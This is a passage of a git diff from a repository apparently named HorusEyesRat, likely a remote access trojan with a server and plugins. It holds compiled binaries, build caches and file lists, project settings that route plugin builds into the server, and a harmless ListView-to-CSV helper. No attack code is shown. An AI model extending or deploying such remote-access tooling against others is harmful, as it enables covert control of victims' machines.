b/SL/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 0000000..d9fe526 Binary files /dev/null and b/SL/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/SL/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/SL/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/SL/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/SL/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/SL/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/SL/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/SL/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/SL/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..1b91c81 Binary files /dev/null and b/SL/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/SL/obj/Release/PL.Resources.resources b/SL/obj/Release/PL.Resources.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/SL/obj/Release/PL.Resources.resources differ diff --git a/SL/obj/Release/SL.dll b/SL/obj/Release/SL.dll new file mode 100644 index 0000000..9d64347 Binary files /dev/null and b/SL/obj/Release/SL.dll differ diff --git a/SL/obj/Release/SL.pdb b/SL/obj/Release/SL.pdb new file mode 100644 index 0000000..9b6e4e6 Binary files /dev/null and b/SL/obj/Release/SL.pdb differ diff --git a/SL/obj/Release/SL.vbproj.CopyComplete b/SL/obj/Release/SL.vbproj.CopyComplete new file mode 100644 index 0000000..e69de29 diff --git a/SL/obj/Release/SL.vbproj.CoreCompileInputs.cache b/SL/obj/Release/SL.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..edfbca3 --- /dev/null +++ b/SL/obj/Release/SL.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +39687a2f52d42aba83863aeb67e13b0845d66073 diff --git a/SL/obj/Release/SL.vbproj.FileListAbsolute.txt b/SL/obj/Release/SL.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..90b3cd6 --- /dev/null +++ b/SL/obj/Release/SL.vbproj.FileListAbsolute.txt @@ -0,0 +1,16 @@ +Z:\HorusEyesRat-master\SL\bin\Release\SL.dll +Z:\HorusEyesRat-master\SL\bin\Release\SL.pdb +Z:\HorusEyesRat-master\SL\bin\Release\SL.xml +Z:\HorusEyesRat-master\SL\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\SL.dll +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\SL.pdb +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\SL.xml +Z:\HorusEyesRat-master\SL\obj\Release\PL.Resources.resources +Z:\HorusEyesRat-master\SL\obj\Release\SL.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\SL\obj\Release\SL.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\SL\obj\Release\SL.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\SL\obj\Release\SL.vbproj.CopyComplete +Z:\HorusEyesRat-master\SL\obj\Release\SL.dll +Z:\HorusEyesRat-master\SL\obj\Release\SL.xml +Z:\HorusEyesRat-master\SL\obj\Release\SL.pdb +Z:\HorusEyesRat-master\SL\obj\Release\SL.vbprojAssemblyReference.cache diff --git a/SL/obj/Release/SL.vbproj.Fody.CopyLocal.cache b/SL/obj/Release/SL.vbproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..c1cd591 --- /dev/null +++ b/SL/obj/Release/SL.vbproj.Fody.CopyLocal.cache @@ -0,0 +1 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/SL/obj/Release/SL.vbproj.GenerateResource.cache b/SL/obj/Release/SL.vbproj.GenerateResource.cache new file mode 100644 index 0000000..c9ae5e6 Binary files /dev/null and b/SL/obj/Release/SL.vbproj.GenerateResource.cache differ diff --git a/SL/obj/Release/SL.vbprojAssemblyReference.cache b/SL/obj/Release/SL.vbprojAssemblyReference.cache new file mode 100644 index 0000000..2269e73 Binary files /dev/null and b/SL/obj/Release/SL.vbprojAssemblyReference.cache differ diff --git a/SL/obj/Release/SL.xml b/SL/obj/Release/SL.xml new file mode 100644 index 0000000..4b2288f --- /dev/null +++ b/SL/obj/Release/SL.xml @@ -0,0 +1,26 @@ + + + + +SL + + + + + + Une classe de ressource fortement typée destinée, entre autres, à la consultation des chaînes localisées. + + + + + Retourne l'instance ResourceManager mise en cache utilisée par cette classe. + + + + + Remplace la propriété CurrentUICulture du thread actuel pour toutes + les recherches de ressources à l'aide de cette classe de ressource fortement typée. + + + + diff --git a/SL/obj/Release/TempPE/My Project.Application.Designer.vb.dll b/SL/obj/Release/TempPE/My Project.Application.Designer.vb.dll new file mode 100644 index 0000000..5b02776 Binary files /dev/null and b/SL/obj/Release/TempPE/My Project.Application.Designer.vb.dll differ diff --git a/SL/obj/Release/TempPE/My Project.Resources.Designer.vb.dll b/SL/obj/Release/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..3239c9e Binary files /dev/null and b/SL/obj/Release/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/TM/TM.vbproj b/TM/TM.vbproj index 688fddb..dc559e9 100644 --- a/TM/TM.vbproj +++ b/TM/TM.vbproj @@ -30,7 +30,7 @@ false true true - bin\Release\ + ..\Server\bin\Release\Plugins\ TM.xml 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 @@ -61,7 +61,7 @@ - + diff --git a/TM/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/TM/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/TM/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/TM/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/TM/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/TM/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/TM/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/TM/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache index 31bff29..a0c53c7 100644 Binary files a/TM/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/TM/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/TM/obj/Debug/TM.dll b/TM/obj/Debug/TM.dll index ec8ade3..1d9ad0b 100644 Binary files a/TM/obj/Debug/TM.dll and b/TM/obj/Debug/TM.dll differ diff --git a/TM/obj/Debug/TM.pdb b/TM/obj/Debug/TM.pdb index dd82986..807d856 100644 Binary files a/TM/obj/Debug/TM.pdb and b/TM/obj/Debug/TM.pdb differ diff --git a/TM/obj/Debug/TM.vbproj.CoreCompileInputs.cache b/TM/obj/Debug/TM.vbproj.CoreCompileInputs.cache index 3518d93..43a9199 100644 --- a/TM/obj/Debug/TM.vbproj.CoreCompileInputs.cache +++ b/TM/obj/Debug/TM.vbproj.CoreCompileInputs.cache @@ -1 +1 @@ -dc70816f6c35a4a14bf1bd289c7d47eabf00d028 +9e3cb451ca1f97d3c1663115d7f3f94789c23a92 diff --git a/TM/obj/Debug/TM.vbproj.FileListAbsolute.txt b/TM/obj/Debug/TM.vbproj.FileListAbsolute.txt index 41a9339..3455ada 100644 --- a/TM/obj/Debug/TM.vbproj.FileListAbsolute.txt +++ b/TM/obj/Debug/TM.vbproj.FileListAbsolute.txt @@ -24,3 +24,16 @@ C:\Users\mehdi\Documents\HorusEyesRat-main\TM\obj\Debug\TM.vbproj.CopyComplete C:\Users\mehdi\Documents\HorusEyesRat-main\TM\obj\Debug\TM.dll C:\Users\mehdi\Documents\HorusEyesRat-main\TM\obj\Debug\TM.xml C:\Users\mehdi\Documents\HorusEyesRat-main\TM\obj\Debug\TM.pdb +Z:\HorusEyesRat-master\TM\bin\Debug\TM.dll +Z:\HorusEyesRat-master\TM\bin\Debug\TM.pdb +Z:\HorusEyesRat-master\TM\bin\Debug\TM.xml +Z:\HorusEyesRat-master\TM\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\TM\obj\Debug\TM.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\TM\obj\Debug\PL.Resources.resources +Z:\HorusEyesRat-master\TM\obj\Debug\TM.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\TM\obj\Debug\TM.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\TM\obj\Debug\TM.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\TM\obj\Debug\TM.vbproj.CopyComplete +Z:\HorusEyesRat-master\TM\obj\Debug\TM.dll +Z:\HorusEyesRat-master\TM\obj\Debug\TM.xml +Z:\HorusEyesRat-master\TM\obj\Debug\TM.pdb diff --git a/TM/obj/Debug/TM.vbproj.Fody.CopyLocal.cache b/TM/obj/Debug/TM.vbproj.Fody.CopyLocal.cache index 4cbd38b..c1cd591 100644 --- a/TM/obj/Debug/TM.vbproj.Fody.CopyLocal.cache +++ b/TM/obj/Debug/TM.vbproj.Fody.CopyLocal.cache @@ -1 +1 @@ -C:\Users\mehdi\Documents\HorusEyesRat-main\PacketLib\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/TM/obj/Debug/TM.vbproj.GenerateResource.cache b/TM/obj/Debug/TM.vbproj.GenerateResource.cache index ae4d4aa..0b103ff 100644 Binary files a/TM/obj/Debug/TM.vbproj.GenerateResource.cache and b/TM/obj/Debug/TM.vbproj.GenerateResource.cache differ diff --git a/TM/obj/Debug/TM.vbprojAssemblyReference.cache b/TM/obj/Debug/TM.vbprojAssemblyReference.cache index 3e8dc9f..188fc48 100644 Binary files a/TM/obj/Debug/TM.vbprojAssemblyReference.cache and b/TM/obj/Debug/TM.vbprojAssemblyReference.cache differ diff --git a/TM/obj/Debug/TempPE/My Project.Application.Designer.vb.dll b/TM/obj/Debug/TempPE/My Project.Application.Designer.vb.dll new file mode 100644 index 0000000..8963244 Binary files /dev/null and b/TM/obj/Debug/TempPE/My Project.Application.Designer.vb.dll differ diff --git a/TM/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll b/TM/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..da149f7 Binary files /dev/null and b/TM/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/TM/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb b/TM/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb new file mode 100644 index 0000000..e7dcac5 --- /dev/null +++ b/TM/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb @@ -0,0 +1,7 @@ +' + Option Strict Off + Option Explicit On + + Imports System + Imports System.Reflection + diff --git a/TM/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed b/TM/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 0000000..d9fe526 Binary files /dev/null and b/TM/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/TM/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/TM/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/TM/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/TM/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/TM/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/TM/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/TM/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/TM/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..e1e6ab3 Binary files /dev/null and b/TM/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/TM/obj/Release/PL.Resources.resources b/TM/obj/Release/PL.Resources.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/TM/obj/Release/PL.Resources.resources differ diff --git a/TM/obj/Release/TM.dll b/TM/obj/Release/TM.dll new file mode 100644 index 0000000..1eafeb4 Binary files /dev/null and b/TM/obj/Release/TM.dll differ diff --git a/TM/obj/Release/TM.pdb b/TM/obj/Release/TM.pdb new file mode 100644 index 0000000..70ee55b Binary files /dev/null and b/TM/obj/Release/TM.pdb differ diff --git a/TM/obj/Release/TM.vbproj.CopyComplete b/TM/obj/Release/TM.vbproj.CopyComplete new file mode 100644 index 0000000..e69de29 diff --git a/TM/obj/Release/TM.vbproj.CoreCompileInputs.cache b/TM/obj/Release/TM.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..21b2c07 --- /dev/null +++ b/TM/obj/Release/TM.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +924bb1f46a9cd158be722f9d1bb1e9723151dbc3 diff --git a/TM/obj/Release/TM.vbproj.FileListAbsolute.txt b/TM/obj/Release/TM.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..c9b240c --- /dev/null +++ b/TM/obj/Release/TM.vbproj.FileListAbsolute.txt @@ -0,0 +1,16 @@ +Z:\HorusEyesRat-master\TM\bin\Release\TM.dll +Z:\HorusEyesRat-master\TM\bin\Release\TM.pdb +Z:\HorusEyesRat-master\TM\bin\Release\TM.xml +Z:\HorusEyesRat-master\TM\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\TM.dll +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\TM.pdb +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\TM.xml +Z:\HorusEyesRat-master\TM\obj\Release\PL.Resources.resources +Z:\HorusEyesRat-master\TM\obj\Release\TM.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\TM\obj\Release\TM.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\TM\obj\Release\TM.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\TM\obj\Release\TM.vbproj.CopyComplete +Z:\HorusEyesRat-master\TM\obj\Release\TM.dll +Z:\HorusEyesRat-master\TM\obj\Release\TM.xml +Z:\HorusEyesRat-master\TM\obj\Release\TM.pdb +Z:\HorusEyesRat-master\TM\obj\Release\TM.vbprojAssemblyReference.cache diff --git a/TM/obj/Release/TM.vbproj.Fody.CopyLocal.cache b/TM/obj/Release/TM.vbproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..c1cd591 --- /dev/null +++ b/TM/obj/Release/TM.vbproj.Fody.CopyLocal.cache @@ -0,0 +1 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/TM/obj/Release/TM.vbproj.GenerateResource.cache b/TM/obj/Release/TM.vbproj.GenerateResource.cache new file mode 100644 index 0000000..c9ae5e6 Binary files /dev/null and b/TM/obj/Release/TM.vbproj.GenerateResource.cache differ diff --git a/TM/obj/Release/TM.vbprojAssemblyReference.cache b/TM/obj/Release/TM.vbprojAssemblyReference.cache new file mode 100644 index 0000000..90f85a2 Binary files /dev/null and b/TM/obj/Release/TM.vbprojAssemblyReference.cache differ diff --git a/TM/obj/Release/TM.xml b/TM/obj/Release/TM.xml new file mode 100644 index 0000000..ac75fd2 --- /dev/null +++ b/TM/obj/Release/TM.xml @@ -0,0 +1,26 @@ + + + + +TM + + + + + + Une classe de ressource fortement typée destinée, entre autres, à la consultation des chaînes localisées. + + + + + Retourne l'instance ResourceManager mise en cache utilisée par cette classe. + + + + + Remplace la propriété CurrentUICulture du thread actuel pour toutes + les recherches de ressources à l'aide de cette classe de ressource fortement typée. + + + + diff --git a/TM/obj/Release/TempPE/My Project.Application.Designer.vb.dll b/TM/obj/Release/TempPE/My Project.Application.Designer.vb.dll new file mode 100644 index 0000000..1b04096 Binary files /dev/null and b/TM/obj/Release/TempPE/My Project.Application.Designer.vb.dll differ diff --git a/TM/obj/Release/TempPE/My Project.Resources.Designer.vb.dll b/TM/obj/Release/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..64ddaab Binary files /dev/null and b/TM/obj/Release/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/Utilities/Properties/AssemblyInfo.cs b/Utilities/Properties/AssemblyInfo.cs new file mode 100644 index 0000000..203d20a --- /dev/null +++ b/Utilities/Properties/AssemblyInfo.cs @@ -0,0 +1,36 @@ +using System.Reflection; +using System.Runtime.CompilerServices; +using System.Runtime.InteropServices; + +// Les informations générales relatives à un assembly dépendent de +// l'ensemble d'attributs suivant. Changez les valeurs de ces attributs pour modifier les informations +// associées à un assembly. +[assembly: AssemblyTitle("Utilities")] +[assembly: AssemblyDescription("")] +[assembly: AssemblyConfiguration("")] +[assembly: AssemblyCompany("")] +[assembly: AssemblyProduct("Utilities")] +[assembly: AssemblyCopyright("Copyright © 2021")] +[assembly: AssemblyTrademark("")] +[assembly: AssemblyCulture("")] + +// L'affectation de la valeur false à ComVisible rend les types invisibles dans cet assembly +// aux composants COM. Si vous devez accéder à un type dans cet assembly à partir de +// COM, affectez la valeur true à l'attribut ComVisible sur ce type. +[assembly: ComVisible(false)] + +// Le GUID suivant est pour l'ID de la typelib si ce projet est exposé à COM +[assembly: Guid("2bd5d6f6-8b32-4032-acd5-195a54ddfe31")] + +// Les informations de version pour un assembly se composent des quatre valeurs suivantes : +// +// Version principale +// Version secondaire +// Numéro de build +// Révision +// +// Vous pouvez spécifier toutes les valeurs ou indiquer les numéros de build et de révision par défaut +// en utilisant '*', comme indiqué ci-dessous : +// [assembly: AssemblyVersion("1.0.*")] +[assembly: AssemblyVersion("1.0.0.0")] +[assembly: AssemblyFileVersion("1.0.0.0")] diff --git a/Utilities/Utilities.csproj b/Utilities/Utilities.csproj new file mode 100644 index 0000000..e56359c --- /dev/null +++ b/Utilities/Utilities.csproj @@ -0,0 +1,49 @@ + + + + + Debug + AnyCPU + {2BD5D6F6-8B32-4032-ACD5-195A54DDFE31} + Library + Properties + Utilities + Utilities + v4.8 + 512 + true + + + true + full + false + bin\Debug\ + DEBUG;TRACE + prompt + 4 + + + pdbonly + true + bin\Release\ + TRACE + prompt + 4 + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/Utilities/Utils.cs b/Utilities/Utils.cs new file mode 100644 index 0000000..5b82e3b --- /dev/null +++ b/Utilities/Utils.cs @@ -0,0 +1,61 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; +using System.Threading.Tasks; +using System.Windows.Forms; + +namespace Utilities +{ + public class Utils + { + public class ListViewToCSV + { + public static void ToCSV(ListView listView, string filePath, bool includeHidden) + { + //make header string + StringBuilder result = new StringBuilder(); + WriteCSVRow(result, listView.Columns.Count, i => includeHidden || listView.Columns[i].Width > 0, i => listView.Columns[i].Text); + //export data rows + foreach (ListViewItem listItem in listView.Items) + WriteCSVRow(result, listView.Columns.Count, i => includeHidden || listView.Columns[i].Width > 0, i => listItem.SubItems[i].Text); + File.WriteAllText(filePath, result.ToString()); + } + + public static void ToCSV(ListView listView, string filePath) + { + //make header string + using (StreamWriter sw = new System.IO.StreamWriter(filePath, false, System.Text.Encoding.Default)) + { + //ajout du titre des colonnes + foreach (ColumnHeader c in listView.Columns) + sw.Write(string.Format("{0};", c.Text)); + sw.WriteLine(""); + + // ajout des données + foreach (ListViewItem item in listView.Items) + { + foreach (ListViewItem.ListViewSubItem subitem in item.SubItems) + sw.Write(string.Format("{0};", subitem.Text)); + sw.WriteLine(""); + } + } + } + private static void WriteCSVRow(StringBuilder result, int itemsCount, Func isColumnNeeded, Func columnValue) + { + bool isFirstTime = true; + for (int i = 0; i < itemsCount; i++) + { + if (!isColumnNeeded(i)) + continue; + if (!isFirstTime) + result.Append(","); + isFirstTime = false; + result.Append(String.Format("\"{0}\"", columnValue(i))); + } + result.AppendLine(); + } + } + } +} diff --git a/Utilities/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs b/Utilities/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs new file mode 100644 index 0000000..15efebf --- /dev/null +++ b/Utilities/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs @@ -0,0 +1,4 @@ +// +using System; +using System.Reflection; +[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] diff --git a/Utilities/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/Utilities/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..7d621af Binary files /dev/null and b/Utilities/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/Utilities/obj/Release/Utilities.csproj.CoreCompileInputs.cache b/Utilities/obj/Release/Utilities.csproj.CoreCompileInputs.cache new file mode 100644 index 0000000..75ec9fa --- /dev/null +++ b/Utilities/obj/Release/Utilities.csproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +b4268252282b6b322258451ea866e3a9a8dc4a47 diff --git a/Utilities/obj/Release/Utilities.csproj.FileListAbsolute.txt b/Utilities/obj/Release/Utilities.csproj.FileListAbsolute.txt new file mode 100644 index 0000000..6f93552 --- /dev/null +++ b/Utilities/obj/Release/Utilities.csproj.FileListAbsolute.txt @@ -0,0 +1,6 @@ +Z:\HorusEyesRat-master\Utilities\bin\Release\Utilities.dll +Z:\HorusEyesRat-master\Utilities\bin\Release\Utilities.pdb +Z:\HorusEyesRat-master\Utilities\obj\Release\Utilities.csprojAssemblyReference.cache +Z:\HorusEyesRat-master\Utilities\obj\Release\Utilities.csproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\Utilities\obj\Release\Utilities.dll +Z:\HorusEyesRat-master\Utilities\obj\Release\Utilities.pdb diff --git a/Utilities/obj/Release/Utilities.csprojAssemblyReference.cache b/Utilities/obj/Release/Utilities.csprojAssemblyReference.cache new file mode 100644 index 0000000..5c2c9a1 Binary files /dev/null and b/Utilities/obj/Release/Utilities.csprojAssemblyReference.cache differ diff --git a/Utilities/obj/Release/Utilities.dll b/Utilities/obj/Release/Utilities.dll new file mode 100644 index 0000000..9821887 Binary files /dev/null and b/Utilities/obj/Release/Utilities.dll differ diff --git a/Utilities/obj/Release/Utilities.pdb b/Utilities/obj/Release/Utilities.pdb new file mode 100644 index 0000000..1fc3d6d Binary files /dev/null and b/Utilities/obj/Release/Utilities.pdb differ diff --git a/WB/WB.vbproj b/WB/WB.vbproj index dbf2c82..f441729 100644 --- a/WB/WB.vbproj +++ b/WB/WB.vbproj @@ -30,7 +30,7 @@ false true true - bin\Release\ + ..\Server\bin\Release\Plugins\ WB.xml 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 @@ -60,7 +60,7 @@ - + diff --git a/WB/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/WB/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/WB/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/WB/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/WB/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/WB/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/WB/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/WB/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache index 40ebbcb..0e1ac02 100644 Binary files a/WB/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/WB/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/WB/obj/Debug/TempPE/My Project.Application.Designer.vb.dll b/WB/obj/Debug/TempPE/My Project.Application.Designer.vb.dll new file mode 100644 index 0000000..8c7dd4a Binary files /dev/null and b/WB/obj/Debug/TempPE/My Project.Application.Designer.vb.dll differ diff --git a/WB/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll b/WB/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..00d4f42 Binary files /dev/null and b/WB/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/WB/obj/Debug/WB.dll b/WB/obj/Debug/WB.dll index f1e086b..43135c1 100644 Binary files a/WB/obj/Debug/WB.dll and b/WB/obj/Debug/WB.dll differ diff --git a/WB/obj/Debug/WB.pdb b/WB/obj/Debug/WB.pdb index ee26238..a669f83 100644 Binary files a/WB/obj/Debug/WB.pdb and b/WB/obj/Debug/WB.pdb differ diff --git a/WB/obj/Debug/WB.vbproj.CoreCompileInputs.cache b/WB/obj/Debug/WB.vbproj.CoreCompileInputs.cache index 0f2cd94..bf7babe 100644 --- a/WB/obj/Debug/WB.vbproj.CoreCompileInputs.cache +++ b/WB/obj/Debug/WB.vbproj.CoreCompileInputs.cache @@ -1 +1 @@ -24451db3c270d182354e38f9877b0d84ab23e0ff +1167e6e4d9cfaa64453698fc09b398eacda12bc4 diff --git a/WB/obj/Debug/WB.vbproj.FileListAbsolute.txt b/WB/obj/Debug/WB.vbproj.FileListAbsolute.txt index 24fbdab..f27df47 100644 --- a/WB/obj/Debug/WB.vbproj.FileListAbsolute.txt +++ b/WB/obj/Debug/WB.vbproj.FileListAbsolute.txt @@ -24,3 +24,16 @@ C:\Users\mehdi\Documents\HorusEyesRat-main\WB\obj\Debug\WB.vbproj.CopyComplete C:\Users\mehdi\Documents\HorusEyesRat-main\WB\obj\Debug\WB.dll C:\Users\mehdi\Documents\HorusEyesRat-main\WB\obj\Debug\WB.xml C:\Users\mehdi\Documents\HorusEyesRat-main\WB\obj\Debug\WB.pdb +Z:\HorusEyesRat-master\WB\bin\Debug\WB.dll +Z:\HorusEyesRat-master\WB\bin\Debug\WB.pdb +Z:\HorusEyesRat-master\WB\bin\Debug\WB.xml +Z:\HorusEyesRat-master\WB\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\WB\obj\Debug\WB.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\WB\obj\Debug\PL.Resources.resources +Z:\HorusEyesRat-master\WB\obj\Debug\WB.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\WB\obj\Debug\WB.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\WB\obj\Debug\WB.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\WB\obj\Debug\WB.vbproj.CopyComplete +Z:\HorusEyesRat-master\WB\obj\Debug\WB.dll +Z:\HorusEyesRat-master\WB\obj\Debug\WB.xml +Z:\HorusEyesRat-master\WB\obj\Debug\WB.pdb diff --git a/WB/obj/Debug/WB.vbproj.Fody.CopyLocal.cache b/WB/obj/Debug/WB.vbproj.Fody.CopyLocal.cache index 4cbd38b..c1cd591 100644 --- a/WB/obj/Debug/WB.vbproj.Fody.CopyLocal.cache +++ b/WB/obj/Debug/WB.vbproj.Fody.CopyLocal.cache @@ -1 +1 @@ -C:\Users\mehdi\Documents\HorusEyesRat-main\PacketLib\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/WB/obj/Debug/WB.vbproj.GenerateResource.cache b/WB/obj/Debug/WB.vbproj.GenerateResource.cache index ae4d4aa..0b103ff 100644 Binary files a/WB/obj/Debug/WB.vbproj.GenerateResource.cache and b/WB/obj/Debug/WB.vbproj.GenerateResource.cache differ diff --git a/WB/obj/Debug/WB.vbprojAssemblyReference.cache b/WB/obj/Debug/WB.vbprojAssemblyReference.cache index ed8fa6d..74f3d20 100644 Binary files a/WB/obj/Debug/WB.vbprojAssemblyReference.cache and b/WB/obj/Debug/WB.vbprojAssemblyReference.cache differ diff --git a/WB/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb b/WB/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb new file mode 100644 index 0000000..e7dcac5 --- /dev/null +++ b/WB/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb @@ -0,0 +1,7 @@ +' + Option Strict Off + Option Explicit On + + Imports System + Imports System.Reflection + diff --git a/WB/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed b/WB/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 